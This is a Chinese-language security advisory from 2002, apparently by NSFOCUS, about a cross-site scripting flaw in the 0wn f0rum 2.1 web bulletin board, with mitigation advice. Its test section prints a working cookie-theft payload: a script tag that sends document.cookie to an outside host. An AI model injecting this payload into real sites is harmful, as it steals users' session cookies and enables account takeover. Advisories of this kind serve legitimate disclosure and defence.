首页 -> 安全研究

安全研究

安全漏洞
0wn f0rum跨站脚本执行漏洞

发布日期:2002-04-27
更新日期:2002-05-08

受影响系统:

0wn f0rum 0wn f0rum 2.1
描述:

BUGTRAQ  ID: 4626

0wn f0rum是一款由ServicesWeb维护的WEB信息公告版系统,可使用在多种Linux和Unix操作系统下。

0wn f0rum对构建通过用户提交的HTML内容没有进行充分正确的检查,可导致攻击者进行跨站脚本执行攻击。

攻击者可以在0wn f0rum任意字段输入包含恶意脚本代码的链接,由于0wn f0rum在生成HTML页面时没有对脚本代码标记进行过滤,浏览用户查看包含恶意代码的链接时,可导致代码在浏览用户浏览器上执行,使用户基于Cookie认证的敏感信息泄露。

<*来源:frog frog (leseulfrog@hotmail.com
  
  链接:http://online.securityfocus.com/archive/82/269917/2002-04-26/2002-05-02/0
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


frog frog (leseulfrog@hotmail.com)提供了如下测试方法:

在用户评论字段中输入如下代码:

<script>document.location='http://www.monsite.com/script.php?'+
document.cookie;</script>



建议:

临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 修改程序,充分过滤用户提交的内容。

厂商补丁:

0wn f0rum
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.0wn-f0rum.ch.vu/



浏览次数:3676
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障